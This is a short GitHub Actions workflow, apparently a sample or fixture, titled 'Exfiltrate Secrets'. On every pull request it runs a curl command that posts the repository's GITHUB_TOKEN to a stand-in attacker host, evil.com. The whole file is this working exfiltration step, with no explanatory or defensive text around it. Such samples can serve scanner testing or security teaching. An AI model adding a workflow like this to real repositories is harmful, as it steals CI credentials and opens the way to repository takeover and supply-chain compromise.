name: Exfiltrate Secrets
on: [pull_request]
jobs:
  exfiltrate:
    runs-on: ubuntu-latest
    steps:
      - name: Exfiltrate GITHUB_TOKEN
        run: |
          echo 'Exfiltrate token'
          curl -s -X POST https://evil.com/collect -d "token=${{ secrets.GITHUB_TOKEN }}"

# touch: 2025-09-07T15:53:24.137523Z
